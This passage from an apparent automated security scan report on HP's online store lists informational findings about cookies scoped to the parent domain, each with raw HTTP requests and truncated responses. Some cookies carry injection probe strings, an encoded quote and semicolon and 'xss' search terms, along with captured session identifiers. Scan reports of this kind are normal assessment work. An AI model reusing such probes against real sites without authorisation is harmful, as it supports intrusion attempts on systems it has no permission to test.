Request

GET /go/microsoftoffers?jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/3/dt_promo_tile3_buy_a_pc_and_get_an_xbox_526 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; HP_EBUS=true; hpcompc_usen=cartExists=true; EMID=; s_depth=23; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Anotebook%3Alaptops%20and%20mini%20pcs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11159; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Acs%25253Adesktops%2526pidt%253D1%2526oid%253D%25252Fgo%25252Fmicrosoftoffers_jumpid%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Fdesktops%25252Fpromo_tile%25252F3%25252Fdt_promo_tile3_buy_a__1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:48 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:49 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 137842

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_he
...[SNIP]...

3.7. http://www.shopping.hp.com/go/touchpadfaqs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /go/touchpadfaqs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/touchpadfaqs;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_tablet_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=2; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ahome; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlktjNuS3QxxMC3vvlfcdgKY0ic%3D; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=1x1x4

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:45 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkti9uU0Ql8NyDuvVDYcwSc0ic%3D; expires=Friday, 20-Jan-2012 00:54:46 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:46 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 129613

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_he
...[SNIP]...

3.8. http://www.shopping.hp.com/printer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /printer

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /printer;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_printers_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; hpshopping=1&user_id=mlksj9iT3wN6My%2FvuVvfeAGd0ic%3D; hpcompc_usen=cartExists=false; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Astatic%3Atouchpadfaqs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=3x3x12

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:50 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkjiNGW3A97NCDouVXddgea0ic%3D; expires=Friday, 20-Jan-2012 00:54:49 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:49 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 199437


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

3.9. http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /scat/desktops/p7xt_series/rts/3/computer_store

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /scat/desktops/p7xt_series/rts/3/computer_store HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 0
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlkjit%2BQ3Ql7NSzqs1TccwGd0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apopup%3Afree%20shipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; EMID=; s_depth=17; s_cc=true; HP_EBUS_HP_CLICKS=4x15x6213; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asdp%25253Adesktops%25253Aeveryday%252520computing%25253Ap7xt_series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BstoConfig.submit()%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:07:54 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkqjt2W2A5xOi3rslfedwOX0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; expires=Friday, 20-Jan-2012 01:07:55 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 01:07:55 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 224469

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps
...[SNIP]...

3.10. http://www.shopping.hp.com/supplies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /supplies

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /supplies;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_supplies_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Astatic%3Atouchpadfaqs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlkiit2e2AN7NS3rulTfcQyX0ic%3D; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=3x3x19

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:55 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkij96W2w9%2FOi%2Frv1TZdg3Tng%3D%3D; expires=Friday, 20-Jan-2012 00:54:56 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:56 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 201400

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps
...[SNIP]...

3.11. http://www.shopping.hp.com/webapp/shopping/can.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/can.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/can.do?landing=esp&category=Notebook&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/psg_ipg/esp/Laptops_and_mini_PCs HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/esp;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; hpcompc_usen=cartExists=true; EMID=; s_depth=21; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ampr%3Aportal%3Amain; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11101; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Aservices%2526pidt%253D1%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fcan.do_landing%25253Desp%252526category%25253DNotebook%252526catLevel%25253D1%252526storeName%25253Dstorefronts%252526jumpid%25253Din__1%2526oidt%253D1%2526ot%253DIMG%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:34 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:35 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 402159


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

3.12. http://www.shopping.hp.com/webapp/shopping/home.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/home.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/home.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hp.com/country/us/en/cs/media/swf/homepage_carousel.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; EMID=; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; s_depth=1; lang=en-us; cc=us; s_cc=true; s_sq=%5B%5BB%5D%5D; h_cm2=cs%3Aus_en_home_message_l1_hho_fixed_shopnow_flashlink

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:29 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrit2T3wh5OijqulLZdgKXmiaumQ%3D%3D; expires=Friday, 20-Jan-2012 00:54:30 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:30 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 148762

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_head
...[SNIP]...

3.13. http://www.shopping.hp.com/webapp/shopping/mpss_portal.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/mpss_portal.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/mpss_portal.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; 